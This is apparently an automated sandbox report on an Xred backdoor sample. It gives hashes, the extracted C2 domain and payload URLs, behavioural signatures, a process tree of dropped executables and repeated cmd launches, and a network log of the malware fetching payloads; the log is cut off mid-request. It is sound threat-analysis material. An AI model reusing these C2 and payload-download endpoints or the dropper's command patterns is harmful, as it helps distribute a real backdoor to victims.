Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01/01/2025, 16:32 UTC

General

  • Target

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe

  • Size

    793KB

  • MD5

    1951df1cc3262a172ce0bd85cc390d00

  • SHA1

    e88411f0b9155eec15712630de1a45b654f52eb3

  • SHA256

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56

  • SHA512

    e06061133c6e987fc53fc1cfb3ddf5394a8d13d8635221bb98dc177f4c794ac3cb3adcbed810d47f6e212cd6082b44021ae9dbe0c113a1bff31a7cda9347aad1

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9TuQj:mnsJ39LyjbJkQFMhmC+6GD9ig

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is a backdoor written in Delphi.

  • Xred family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe
    "C:\Users\Admin\AppData\Local\Temp\98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:920
    • C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2828
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1808
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1188
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3900
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2604
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4464
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4712
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1444
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5080
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1100
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1728
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4952
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4140
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4408
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4948
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:672
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:540
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:884
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4160
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4452
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4040
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2840
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2588
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:216
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1736
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3240
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4616
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1544
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3456
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2544
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1928
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2132

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    133.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    xred.mooo.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    xred.mooo.com
    IN A
    Response
  • flag-us
    DNS
    freedns.afraid.org
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    freedns.afraid.org
    IN A
    Response
    freedns.afraid.org
    IN A
    69.42.215.252
  • flag-us
    GET
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    Synaptics.exe
    Remote address:
    69.42.215.252:80
    Request
    GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 01 Jan 2025 16:32:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Cache: MISS
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    49.192.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    49.192.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    docs.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    docs.google.com
    IN A
    Response
    docs.google.com
    IN A
    216.58.214.174
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:52 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-ElzVfNHDWgAcoJdgWfX5xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-1Nfnc7eDlAOKrHu7EcyHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:54 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-iwdJI-4NRqPcuvIccx2MPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://c.pki.goog/r/r1.crl
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Wed, 01 Jan 2025 16:27:48 GMT
    Expires: Wed, 01 Jan 2025 17:17:48 GMT
    Cache-Control: public, max-age=3000
    Age: 364
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    o.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Wed, 01 Jan 2025 16:28:31 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 321
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Wed, 01 Jan 2025 15:34:20 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 3572
  • flag-us
    DNS
    drive.usercontent.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.74.225
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4wrWi4NCk5oiLsHp5orTwsG_RtlOisafSQeX1uU6bdWRMn7fAdRYjtUS7sHMtl-u9-
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: script-src 'report-sample' 'nonce-v6B-Ocu60H_SqJAPZpwgTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150; expires=Thu, 03-Jul-2025 16:33:53 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5fR97-fSUFz3f1yUTKqQo1rOVFvAHb52u7b1tCq5_5A23x9g8NWW_pFgqP59O0UnH4fHaLT1w
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-e167fJ8mLyZbsRpVX3cCig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
